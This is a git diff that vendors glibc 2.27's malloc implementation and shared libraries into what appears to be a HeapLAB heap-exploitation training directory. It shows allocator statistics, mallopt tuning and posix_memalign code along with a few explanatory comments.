+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+  check_action = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
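+
+/*
+  Usage note (illustrative; assumes a glibc built with tunables
+  support): the do_set_tcache_* helpers above are normally reached
+  through the GLIBC_TUNABLES environment variable rather than through
+  mallopt, e.g.
+
+    // run ./app with tcache kept empty by setting its per-bin count to 0
+    // GLIBC_TUNABLES=glibc.malloc.tcache_count=0 ./app
+
+  With tcache_count set to 0 the tcache bins are never filled, so frees
+  and allocations fall through to the fastbin and unsorted-bin paths.
+*/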
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		    "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		      "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the ALIGNMENT argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
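+
+/*
+  Caller-side sketch (illustrative only): the alignment must be a power
+  of two and a multiple of sizeof (void *), otherwise EINVAL is
+  returned.
+
+    #include <errno.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *buf = NULL;
+
+      // 64 is a power of two and a multiple of sizeof (void *): OK.
+      if (posix_memalign (&buf, 64, 1024) != 0)
+        return 1;
+      free (buf);
+
+      // 24 is a multiple of sizeof (void *) but not a power of two.
+      return posix_memalign (&buf, 24, 1024) == EINVAL ? 0 : 1;
+    }
+*/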
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.27/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27/ld-2.27.so
new file mode 100755
index 0000000..6cb4121
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27/ld.so.2 b/HeapLAB/.glibc/glibc_2.27/ld.so.2
new file mode 120000
index 0000000..2ffc93b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27/ld.so.2
@@ -0,0 +1 @@
+ld-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27/libc-2.27.so
new file mode 100755
index 0000000..b334132
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27/libc.so.6 b/HeapLAB/.glibc/glibc_2.27/libc.so.6
new file mode 120000
index 0000000..aa8ad7a
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27/libc.so.6
@@ -0,0 +1 @@
+libc-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.27/malloc/malloc.c
new file mode 100644
index 0000000..f8e7250
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27/malloc/malloc.c
@@ -0,0 +1,5607 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already, by default, be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  Linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
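+
+/*
+  A worked instance of the size arithmetic described under "Vital
+  statistics" above (a sketch; assumes the common 64-bit configuration
+  with 8-byte size_t and 16-byte MALLOC_ALIGNMENT):
+
+    #include <assert.h>
+    #include <malloc.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      // 24 bytes plus the 8-byte size header fit exactly in a 0x20-byte
+      // chunk, the minimum; the usable size reported back is 24.
+      void *a = malloc (24);
+      assert (malloc_usable_size (a) == 24);
+
+      // 25 bytes spill into the next 16-byte step: a 0x30-byte chunk
+      // with 40 usable bytes.
+      void *b = malloc (25);
+      assert (malloc_usable_size (b) == 40);
+
+      free (a);
+      free (b);
+      return 0;
+    }
+*/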
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
